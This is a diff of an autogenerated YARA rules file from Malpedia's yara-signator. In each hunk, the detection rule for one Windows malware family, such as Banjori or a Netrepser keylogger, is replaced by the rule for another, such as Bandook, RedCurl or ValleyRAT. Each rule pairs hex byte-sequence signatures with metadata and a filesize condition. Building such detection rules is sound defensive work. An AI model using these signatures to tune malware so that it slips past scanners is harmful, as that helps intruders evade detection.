@@ -144830,32 +144665,32 @@ rule MALPEDIA_Win_Adkoob_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4eb0 8b4004 c74430980c4b4c00 8b4698 8b5004 8d4298 89443294 }
-		$sequence_1 = { 8b45f8 53 ff75fc 50 6a7e 5a 8bcf }
-		$sequence_2 = { 894638 85c0 740f 68???????? 50 ff15???????? 894640 }
-		$sequence_3 = { 898424fc000000 33c0 898424f8000000 89842400010000 89842404010000 8a83a4010000 88443134 }
-		$sequence_4 = { 897dec 8945fc 85ff 741b 8b7508 8bcf 56 }
-		$sequence_5 = { b8???????? e8???????? 8bf2 8bf9 89bd0cffffff 33c0 898508ffffff }
-		$sequence_6 = { 8bf9 83fb1c 7517 837f2400 7511 ff750c 8b5508 }
-		$sequence_7 = { 8d4e28 51 8d4e20 f7de 8b10 1bf6 23f1 }
-		$sequence_8 = { 8b4714 8945f8 81e1f7ff0000 8bd3 66894f18 8bce e8???????? }
-		$sequence_9 = { ff75c4 ffb540ffffff e8???????? 83c428 837da400 741a ffb56cffffff }
+		$sequence_0 = { 7407 6a01 e8???????? 8a15???????? }
+		$sequence_1 = { 8b4c2434 c1e908 32c8 884c2435 8b542434 c1ea10 }
+		$sequence_2 = { 56 89442420 b37b e8???????? 85ff }
+		$sequence_3 = { 8d4c240c b81f85eb51 f7e9 8bc1 c1fa05 50 }
+		$sequence_4 = { 85db 7474 57 e8???????? 83c404 85c0 }
+		$sequence_5 = { 56 8be8 e8???????? 6a64 }
+		$sequence_6 = { 50 ba11010000 8bcf e8???????? 83fe66 }
+		$sequence_7 = { 83ec14 85c0 756f a1???????? 8b0d???????? }
+		$sequence_8 = { ff15???????? 8a0d???????? 22cb 85f6 8935???????? }
+		$sequence_9 = { 68???????? e8???????? a1???????? 0fafc6 }
 
 	condition:
-		7 of them and filesize < 1867776
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Unidentified_116_Auto : FILE
+rule MALPEDIA_Win_Venomloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e8b2ca1f-b6d4-5e1a-8d04-484724c2f148"
+		id = "360daa47-065f-559b-a4bd-3c105892d050"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_116"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_116_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.venomloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.venomloader_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "aa3fe5ce882f091eaea8e0baeea989ea94aa46089f7c3aca2e5f5e4ccdc04bad"
+		logic_hash = "2a010e987b08fda7866a0ce45dd38105218c7c231dfd9f1e74d7bf8cc14fb654"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144869,32 +144704,32 @@ rule MALPEDIA_Win_Unidentified_116_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48 8d0d628bfaff ff15???????? 48 8d05158bfaff 83fe01 48 }
-		$sequence_1 = { e8???????? 48 89442428 4c 8d05a724fcff 4c }
-		$sequence_2 = { ff15???????? 83f8ff 7508 ff15???????? 8bd8 4c 8b8608010000 }
-		$sequence_3 = { 8bd9 48 8901 f6c201 740a ba38000000 e8???????? }
-		$sequence_4 = { 8b7c2460 49 63e8 48 03ea 44 8b3f }
-		$sequence_5 = { 8bc0 c1e010 c1e910 0bc8 41 c1e810 0fb6432f }
-		$sequence_6 = { eb44 48 8b4c2420 e8???????? 48 8bf8 48 }
-		$sequence_7 = { f20f59d3 48 03c2 48 ba00803ed5 deb19d014803 c28944 }
-		$sequence_8 = { 41 5e c3 48 896c2430 48 897c2440 }
-		$sequence_9 = { 8bf9 0f84be000000 48 895c2430 48 89742438 48 }
+		$sequence_0 = { 48894d10 895518 4c894520 837d1803 7758 837d1802 }
+		$sequence_1 = { 488d1503ad0a00 c70105000000 48895108 c3 488d15f1ac0a00 c7010b000000 48895108 }
+		$sequence_2 = { 53 4883ec20 4889cb 488d0d91b90000 e8???????? 4889c2 488b03 }
+		$sequence_3 = { 4883e918 4c89e2 e8???????? eb88 488d0d07f10400 e8???????? 4889c3 }
+		$sequence_4 = { 4889742468 0f11742450 e8???????? 488b442470 488b542478 488b9c2488000000 4889542478 }
+		$sequence_5 = { 48c1ea20 83e201 4c39d9 72df 4983eb01 4d29eb 4983e3fc }
+		$sequence_6 = { 84d2 0f84b8000000 384549 7452 384548 744d 38c1 }
+		$sequence_7 = { 4989d0 488d1540910c00 4889c1 e8???????? 488d85d0040000 488d95f0040000 4c8d05d3910c00 }
+		$sequence_8 = { 4c89e2 4889e9 66897c2468 e8???????? 89c7 84c0 0f85fd050000 }
+		$sequence_9 = { 48895e18 8b08 85c9 0f853e010000 83430801 488d05e02d0b00 48897e20 }
 
 	condition:
-		7 of them and filesize < 1040384
+		7 of them and filesize < 2592768
 }
-rule MALPEDIA_Win_Megumin_Auto : FILE
+rule MALPEDIA_Win_Sykipot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4a2dcf8-4894-5cef-ac41-bcc9553ffc60"
+		id = "e29757c6-dae5-5753-908e-00d3e87a0250"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.megumin_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sykipot_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "ea7444cfb1798579fc346f04ef83b325fb03cf7f61d5558430123962ac8f5635"
+		logic_hash = "744def3f8deb3752311459797b4729b29083d33b4fd30373345787d25fb29e80"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144908,32 +144743,32 @@ rule MALPEDIA_Win_Megumin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c418 c745fc04000000 bb1f000000 83781410 899de0feffff 7202 }
-		$sequence_1 = { c1e81f c78570ffffff0f000000 c6855cffffff00 f20f5804c540814600 f20f5885f8feffff f20f1185f8feffff e8???????? }
-		$sequence_2 = { 3bc2 0f827a0c0000 2bce 2bc2 83c1fe 3bc1 0f42c8 }
-		$sequence_3 = { 6a03 68???????? 8d8da4fdffff e8???????? 83bdb8fdffff10 8d95a4fdffff ffb5b4fdffff }
-		$sequence_4 = { 8d4dc0 c645fc03 8bf0 e8???????? 85f6 0f844f010000 8b95e0fdffff }
-		$sequence_5 = { 68???????? e8???????? 8d7db8 8d4f01 0f1f4000 8a07 47 }
-		$sequence_6 = { c7461000000000 0f42bde0feffff 83bde4feffff10 57 0f438dd0feffff 51 c746140f000000 }
-		$sequence_7 = { 8d9570fbffff 2bd1 8a01 8d4901 88440aff 84c0 }
-		$sequence_8 = { 8bcf ffb5c4fbffff 6a05 e8???????? 8bf8 c785bcfbffff00000000 c785c0fbffff00000000 }
-		$sequence_9 = { 0f8700010000 c1e003 3d00100000 721f 8d4823 3bc8 0f86f0000000 }
+		$sequence_0 = { 8d842494030000 68???????? 50 ffd6 83c40c 85c0 0f85fd000000 }
+		$sequence_1 = { 8bcd 83e103 8d442410 f3a4 }
+		$sequence_2 = { b93f000000 33c0 8dbc2469060000 88942468070000 f3ab }
+		$sequence_3 = { 3bf3 89742438 751b 8d4c2424 }
+		$sequence_4 = { 83c408 85c0 75da 8b85e8feffff 8b8dd8feffff eb06 }
+		$sequence_5 = { c1e902 f3a5 8bcd 8d94248c010000 83e103 }
+		$sequence_6 = { aa c744241820000000 52 8d442428 50 ff15???????? 83c9ff }
+		$sequence_7 = { 8b94242c060000 56 8d842498000000 57 }
+		$sequence_8 = { 50 ffd6 83c40c 8d4c2428 51 68???????? 6a00 }
+		$sequence_9 = { e8???????? 83c410 68???????? ffd5 8d842488000000 50 ffd5 }
 
 	condition:
-		7 of them and filesize < 1007616
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Chairsmack_Auto : FILE
+rule MALPEDIA_Win_Penco_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4b93b15a-7734-556f-a7b1-b4512d41aa64"
+		id = "6aee07a7-ef18-5814-98a9-4888b78c9e4c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chairsmack"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chairsmack_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.penco_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "1d38706ad5291374964e24dbf3b78379e0e5a0a84fd9338e0e05cc9f4e1d7fa2"
+		logic_hash = "cbd5d55ae946f04f495d8f2278cd17d368565e9345c264d195e742a52381e75b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144947,32 +144782,32 @@ rule MALPEDIA_Win_Chairsmack_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a01 41 84c0 75f9 2b4dac 8d450c 6a00 }
-		$sequence_1 = { c7462000000000 c7462400000000 c7462800000000 c7462c00000000 e8???????? 6819020000 68???????? }
-		$sequence_2 = { 8d44241c 50 e8???????? 50 c684248c00000002 e8???????? }
-		$sequence_3 = { 8b8dd0fdffff 83e11f c1e106 030c85d06d4a00 898d30fdffff eb0a c78530fdffff78474a00 }
-		$sequence_4 = { 50 e8???????? 83c404 8d8580feffff 68b8000000 6a00 50 }
-		$sequence_5 = { 68???????? e8???????? 83ec1c c68424b80300009f 8bcc 68???????? e8???????? }
-		$sequence_6 = { 837dc800 7526 68???????? 68???????? 6a00 68de000000 68???????? }
-		$sequence_7 = { ff15???????? 8b4d08 8b148dcc504a00 83e202 740d 8d85e4dfffff 50 }
-		$sequence_8 = { 0fb745ec eb5a 8d45ec 8d4dc8 3945c0 7579 8d4594 }
-		$sequence_9 = { 7207 8b16 895518 eb03 897518 83f810 7204 }
+		$sequence_0 = { 33349500d83400 8bcf c1e918 33348d28ec3400 8b4c2410 0fb6d1 33349500d43400 }
+		$sequence_1 = { 75f6 8b542410 52 ff15???????? 6800c00000 6a00 56 }
+		$sequence_2 = { 51 8d95ecf0ffff 52 8b85b0fdffff 8d8c05e0fdffff 51 }
+		$sequence_3 = { 6800300000 8b9548feffff 52 6a00 ff15???????? 8945e4 }
+		$sequence_4 = { ff15???????? 68???????? 8b4de4 51 ff15???????? 6a02 }
+		$sequence_5 = { 8d8c245c020000 51 03f0 8d142e 68???????? 52 e8???????? }
+		$sequence_6 = { 69c0c4020000 c784059c96ffff4d000000 e9???????? c7851c94ffff00000000 b901000000 85c9 0f8409090000 }
+		$sequence_7 = { 8b4508 56 8d34c5c0c23400 833e00 7513 50 e8???????? }
+		$sequence_8 = { 3bc6 740b 3dea000000 0f85d8000000 8b6c2410 3bee 0f84da000000 }
+		$sequence_9 = { 8b349528ec3400 8b542414 894c241c 8b4c2410 c1e910 0fb6f9 3334bd28e83400 }
 
 	condition:
-		7 of them and filesize < 1974272
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Banjori_Auto : FILE
+rule MALPEDIA_Win_Bandook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7079fb2-7d83-5fd6-84aa-1cae4150d033"
+		id = "49488c81-393e-59b5-ae7a-2a41b9e495a2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.banjori_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bandook_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "816a568e5c1724a9f1a3d5f87d5d1a32e57fcc3fa600870ee04fd6629cdfe757"
+		logic_hash = "aa9d013de87f3f2f49289f0a80f6ab44faf8f44b73388fb66ee1528c334b1487"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144986,34 +144821,34 @@ rule MALPEDIA_Win_Banjori_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75f1 b0ec fd f2ae 817ffd8bff558b 75f5 fc }
-		$sequence_1 = { ff15???????? ff75ec ff15???????? 40 50 ff75ec 6a01 }
-		$sequence_2 = { ff75f8 ff15???????? 8d3dac169500 57 ff15???????? 40 50 }
-		$sequence_3 = { 53 53 53 8d45ec 50 ff75f0 ff75f8 }
-		$sequence_4 = { 8985b0feffff 83f864 0f82c2000000 40 50 6a40 ff15???????? }
-		$sequence_5 = { 395df0 741b 53 53 53 53 53 }
-		$sequence_6 = { e9???????? 55 8bec 83c4f4 57 56 53 }
-		$sequence_7 = { 0145f4 6a42 ff75f4 ff75f8 ff15???????? 8945f8 ff75dc }
-		$sequence_8 = { 68f1000000 51 ff15???????? 8b4e08 e32c 894de4 895de8 }
-		$sequence_9 = { 7808 3d64696a6e 90 7507 e8???????? ebc7 ff35???????? }
+		$sequence_0 = { 8b85f0bfffff 8985a0beffff 89b598beffff 899d94beffff }
+		$sequence_1 = { 8d95f4fbffff 83c414 e8???????? 8b4df8 33cd 5e e8???????? }
+		$sequence_2 = { 8b45f0 0fb640f8 0fb680789d1c13 3334c5a3c31e13 8bc2 c1e818 0fb688789d1c13 }
+		$sequence_3 = { 83c404 89442414 68c0d40100 e8???????? 83c404 8bf8 }
+		$sequence_4 = { 8945fc 803d????????01 8b4508 753a ff30 ba???????? }
+		$sequence_5 = { 8bc8 e8???????? 83c408 8d4704 c707???????? c700???????? 8b4df4 }
+		$sequence_6 = { 58 6bc000 c7805cd11e1302000000 6a04 58 6bc000 8b0d???????? }
+		$sequence_7 = { 64a300000000 8bf9 897dac c745fc00000000 897d98 c745a800000000 0f2805???????? }
+		$sequence_8 = { e8???????? 8bf0 83c404 8975e0 6a00 8bce c645fc01 }
+		$sequence_9 = { 0fb708 8d4002 66894c02fe 6685c9 75f0 8d8c24c00d0000 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 23088128
 }
-rule MALPEDIA_Win_Unidentified_104_Auto : FILE
+rule MALPEDIA_Win_Redcurl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "22cbe35d-f38f-5d67-9ed1-a6824dbbad6b"
+		id = "d681119a-f653-5bed-a537-3617b5c42d11"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_104_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redcurl_auto.yar#L1-L199"
 		license_url = "N/A"
-		logic_hash = "7237a55b9f406cfa347ef2bcf70f76cf7dbf15c7062684d829227ca0ac28ac39"
+		logic_hash = "e9dbdef2d970be2c43c2c35ff66ca296c8c7b5f23d7ab81a2c0ef377599edc93"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -145025,32 +144860,43 @@ rule MALPEDIA_Win_Unidentified_104_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b7910 488bd9 488bcf 4c8bf2 e8???????? ba20000000 498bce }
-		$sequence_1 = { 488bf9 498bd8 488d4c2420 e8???????? 41b804000000 488d4c2450 488bd3 }
-		$sequence_2 = { 48897e10 48897e18 0f1000 0f1106 0f104810 0f114e10 48897810 }
-		$sequence_3 = { 8bda e8???????? 4885c0 750d e8???????? 33c0 4883c420 }
-		$sequence_4 = { 4c8bb42490000000 498b86a0000000 4803c1 4c03d8 4933d3 4c895c2408 4c8bda }
-		$sequence_5 = { 4933ca 4c8b942490000000 498b82a8000000 4803c1 4c03c0 4933d0 }
-		$sequence_6 = { cc e8???????? 4d8d4601 488bd6 498bcf e8???????? 48891e }
-		$sequence_7 = { 41c1ea19 4433d0 4403742408 4503e2 8b442404 4133dc }
-		$sequence_8 = { e8???????? 4439b59c000000 7413 e9???????? ff15???????? cc 4489b59c000000 }
-		$sequence_9 = { 49c1e820 4c33c2 488b542420 4903d0 4c33ca 498bc9 }
+		$sequence_0 = { 2bc6 48 50 56 }
+		$sequence_1 = { f7f9 80c261 88143e 47 }
+		$sequence_2 = { ff15???????? 8bd0 c7461000000000 8bca }
+		$sequence_3 = { 6a00 6a00 6aff 8bf8 6a00 57 }
+		$sequence_4 = { 6a00 6a00 50 53 ff15???????? 6a00 6a00 }
+		$sequence_5 = { 85ff 747a 85c0 7476 6800010000 }
+		$sequence_6 = { 8bf0 6a00 6a03 6a00 }
+		$sequence_7 = { 0f85e90b0000 eb00 f30f7e442404 660f2815???????? 660f28c8 }
+		$sequence_8 = { 8b4610 3bc2 726f 2bc2 }
+		$sequence_9 = { 3bc2 0f42d0 0fb6041a 03d3 }
+		$sequence_10 = { e8???????? c745e800000000 c745ec0f000000 c645d800 8d5001 8b4610 }
+		$sequence_11 = { 6a00 6a50 51 56 ff15???????? 8bd8 }
+		$sequence_12 = { 726f 2bc2 83c9ff 83f8ff 0f42c8 }
+		$sequence_13 = { 8d4590 c7458c00000000 894588 c6459000 e8???????? }
+		$sequence_14 = { c70424???????? e8???????? 8b5304 83c001 83ec0c 39d0 }
+		$sequence_15 = { c785acfcffff00000000 8985a8fcffff 8d8580fdffff c7442408???????? }
+		$sequence_16 = { 0f84f31d0000 0fb60e 83c601 3dff000000 }
+		$sequence_17 = { 0fb607 888598feffff 8b852cfdffff 89b594feffff }
+		$sequence_18 = { 0f84b70c0000 8bb538feffff 39f2 0f86c50a0000 }
+		$sequence_19 = { 890424 e8???????? 8b85c4fbffff 83ec08 8d9510feffff }
+		$sequence_20 = { 8944240c 8b856cfdffff 89442404 e8???????? 83ec10 8d8500fcffff }
 
 	condition:
-		7 of them and filesize < 263168
+		7 of them and filesize < 487424
 }
-rule MALPEDIA_Win_Jimmy_Auto : FILE
+rule MALPEDIA_Win_Polyvice_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "571698ec-d0cc-5f2f-93fe-935369535da3"
+		id = "a1ddf89c-1c54-5551-99ab-406b8afd6790"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jimmy_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.polyvice_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "4dcefc186990b0fab3b8fbf45f928a3141684ff216c800369029d79b753cf37a"
+		logic_hash = "2b6e9e23b007599969dc0f145dba20938a3646054daf998e366135a635120584"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145064,32 +144910,32 @@ rule MALPEDIA_Win_Jimmy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 83c40c 85c0 7460 e8???????? }
-		$sequence_1 = { 32c0 eb6f 8b45e8 2b45f0 }
-		$sequence_2 = { e8???????? 59 668945f2 ff750c e8???????? 59 }
-		$sequence_3 = { 8b4dec 0fbe09 3bc1 755b }
-		$sequence_4 = { c745fc12030900 e9???????? 837de805 752c ff75e4 }
-		$sequence_5 = { 81ec40020000 c685cbfdffff01 6a00 6a02 e8???????? }
-		$sequence_6 = { 8d840004010000 50 e8???????? 59 89856cfeffff ff7508 }
-		$sequence_7 = { eb12 8b45f8 c6805001000001 33c0 0f855effffff 8b45f8 c9 }
-		$sequence_8 = { 59 59 ff75f4 e8???????? 59 ff75f8 }
-		$sequence_9 = { 8b45f8 8945f4 8b450c 8945fc }
+		$sequence_0 = { c1c207 4431c2 01ca 4489c9 c1c902 01d6 4189c8 }
+		$sequence_1 = { 41d1c1 4589ca 4589c1 4109f9 21fd 448954240c 4121c9 }
+		$sequence_2 = { 4c897c2420 e8???????? 488b0d???????? 4989c4 ffd3 488b2d???????? }
+		$sequence_3 = { 4489ef c1ef0a 4589d5 31f8 4531dd 01c2 4489e8 }
+		$sequence_4 = { 5b 5e 5f 5d c3 488d0de5a90100 41b804010000 }
+		$sequence_5 = { 41895120 0fb710 0fb64002 6641895125 41884127 488b443c48 }
+		$sequence_6 = { c1e80a 4131c6 4489d0 4189da 438d143e 21d8 41c1ca06 }
+		$sequence_7 = { 4131c0 4521d0 41c1ca02 4131d0 8d942a9979825a 4101c8 4489c9 }
+		$sequence_8 = { 4c8d0526d40000 c1e008 31c3 89f8 c1e818 0fb6d3 458b1c82 }
+		$sequence_9 = { 664139dc 0f46d9 83c201 0fb7c2 4439f0 7cdc }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 369664
 }
-rule MALPEDIA_Win_Tuoni_Auto : FILE
+rule MALPEDIA_Win_Unidentified_092_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d6fe1657-0ba1-5787-bb02-c66c2de38004"
+		id = "59b4c790-d726-59b3-ba7e-c5c1b1aad17c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tuoni"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tuoni_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_092"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_092_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "1e49c2155d5f2354628f8bc71b59233071caabc76e3825284e0656eaaabf9b91"
+		logic_hash = "94c0cdecf630787615c3fd3071d6bf919aa9412f5889bd4558c045e4fba0dd89"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145103,32 +144949,32 @@ rule MALPEDIA_Win_Tuoni_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 84c0 7427 3c07 7423 8b4108 c6401c01 c7401816000000 }
-		$sequence_1 = { 894604 e8???????? 894604 8bc6 59 e8???????? c20400 }
-		$sequence_2 = { e8???????? b8???????? e9???????? 8d4dd8 e9???????? 8b45d0 83e001 }
-		$sequence_3 = { e8???????? 8d8daffbffff c645fc0a 51 8b08 e8???????? 8b8db4fbffff }
-		$sequence_4 = { 7429 6a08 59 33c0 83ec18 8bfe f3ab }
-		$sequence_5 = { 894c2414 8d0c28 89442420 8974241c 894c2418 55 7630 }
-		$sequence_6 = { e8???????? 83c40c 6b45e430 8945dc 8d80602a4500 8945e4 803800 }
-		$sequence_7 = { 85c0 7422 ff75e0 e8???????? ff75e4 e8???????? 53 }
-		$sequence_8 = { 0f848a030000 51 51 8bcc 8d45d8 50 8919 }
-		$sequence_9 = { e8???????? 83c40c 8d85a8fbffff 6a08 50 ff15???????? 85c0 }
+		$sequence_0 = { 50 8b08 ff511c c745fcffffffff 83ceff 8b7db4 }
+		$sequence_1 = { e8???????? 83bd94f6ffff08 8d8d98f5ffff 8d8580f6ffff 0f438580f6ffff 51 }
+		$sequence_2 = { 57 6a00 ff15???????? 50 ff15???????? 8bc3 8b4df4 }
+		$sequence_3 = { 8d8d14f6ffff e8???????? 8d8d14f6ffff 8ad8 e8???????? 84db 0f84b0000000 }
+		$sequence_4 = { 8b5ddc 03ca 23c7 8bd3 0bf0 c1ca0b 03f1 }
+		$sequence_5 = { 8b470c 89460c 8b4710 894610 c745fc00000000 8d4e14 c706???????? }
+		$sequence_6 = { c1c10a c1ca0d 33d1 895dfc 8b4df4 c1c902 33d1 }
+		$sequence_7 = { 8d8db8fdffff 81e37fffffff e8???????? f6c340 }
+		$sequence_8 = { ffd7 8bf8 897dd4 eb03 8b7dd4 }
+		$sequence_9 = { 51 8bd0 8d8d68fbffff e8???????? 8bf8 83c410 8d045b }
 
 	condition:
-		7 of them and filesize < 734208
+		7 of them and filesize < 10202112
 }
-rule MALPEDIA_Win_Netrepser_Keylogger_Auto : FILE
+rule MALPEDIA_Win_Elirks_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f772ff80-f7e1-59f5-b4f9-deba38267db2"
+		id = "43457097-ea8b-5864-bbde-86ef37584143"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netrepser_keylogger_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.elirks_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "13abde176c0dbe626f8e6b9e0859b33d03f906fc80a16b44518b3026f31a5776"
+		logic_hash = "9b5bf7e4bf894eff89b4a5704e72b876af8697001a5b80ec9161e8abc0610ab3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145142,40 +144988,34 @@ rule MALPEDIA_Win_Netrepser_Keylogger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff15???????? 8b550c 8902 8b450c 833800 742b }
-		$sequence_1 = { 51 8b5510 8b02 50 e8???????? 83f8ff 7507 }
-		$sequence_2 = { 895108 8b4538 89410c 8b553c 895110 8b4528 50 }
-		$sequence_3 = { 8b45e4 8945c0 eb07 c745c000000000 }
-		$sequence_4 = { 833d????????00 0f85ab000000 c645dc53 c645dd48 }
-		$sequence_5 = { 81ec3c010000 6804010000 8d85e0feffff 50 6a00 ff15???????? }
-		$sequence_6 = { 8d4310 8d89245b4100 5a 668b31 41 668930 41 }
-		$sequence_7 = { e9???????? c645cc44 c645cd41 c645ce54 }
-		$sequence_8 = { 8b701c 8bcf e8???????? 8b4c240c 0fb711 }
-		$sequence_9 = { c74424104c6f6164 c74424144c696272 c744241861727941 8974241c ff15???????? 8bc8 }
-		$sequence_10 = { 8b4d18 8d7520 e8???????? 83c418 85c0 }
-		$sequence_11 = { 8b0d???????? 51 e8???????? 8b442430 8b542414 8910 83c404 }
-		$sequence_12 = { ff15???????? a3???????? 8b542448 6a40 6800300000 52 6a00 }
-		$sequence_13 = { 3bc5 7d08 5d 33c0 5b 83c418 }
-		$sequence_14 = { 85c0 750d 8b442418 e8???????? 85c0 }
-		$sequence_15 = { 81c408010000 c3 8bff 55 8bec }
+		$sequence_0 = { 894608 5f 5e 81c40c020000 c3 }
+		$sequence_1 = { 0f848b010000 8b742414 8b15???????? 6a00 8d442440 50 }
+		$sequence_2 = { 56 8d7e08 57 8d442420 50 8d4c241c 51 }
+		$sequence_3 = { 52 8d5104 83c0ff 52 }
+		$sequence_4 = { 8d4c2414 51 8bd1 52 ff15???????? f605????????02 742c }
+		$sequence_5 = { 52 6a00 8bc3 e8???????? 85c0 7515 }
+		$sequence_6 = { 6a0c 50 b908000000 8bc7 e8???????? 8bf0 83c408 }
+		$sequence_7 = { 0f8592000000 f605????????08 a1???????? 53 8b1d???????? }
+		$sequence_8 = { 8b1d???????? 8b2d???????? 8b8120c20000 6aff 50 }
+		$sequence_9 = { e8???????? 85c0 7414 8b44241c 8d542410 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Thunker_Auto : FILE
+rule MALPEDIA_Win_Valley_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c02652c6-959e-5488-b341-ccfb73521f28"
+		id = "e31e391b-1d98-571d-b2e1-793b94f7ca99"
 		date = "2026-01-05"
